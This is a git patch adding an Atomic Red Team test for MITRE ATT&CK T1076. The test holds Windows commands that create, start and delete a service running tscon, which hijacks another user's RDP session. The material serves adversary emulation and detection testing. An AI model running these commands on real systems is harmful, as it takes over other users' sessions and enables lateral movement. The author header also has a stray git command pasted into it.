From 5f6014148dcc41d12813cce2d27ed26b81c0f2d2 Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Fri, 25 May 2018 09:35:52 -0400
Subject: [PATCH] T1076

T1076 shipment
---
 atomics/T1076/T1076.yaml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 atomics/T1076/T1076.yaml

diff --git a/atomics/T1076/T1076.yaml b/atomics/T1076/T1076.yaml
new file mode 100644
index 00000000..d1c4152b
--- /dev/null
+++ b/atomics/T1076/T1076.yaml
@@ -0,0 +1,20 @@
+---
+attack_technique: T1076
+display_name: Remote Desktop Protocol
+
+atomic_tests:
+- name: RDP
+  description: |
+    RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization
+
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: command_prompt
+    command: |
+      query user
+      sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
+      net start sesshijack
+      sc.exe delete sesshijack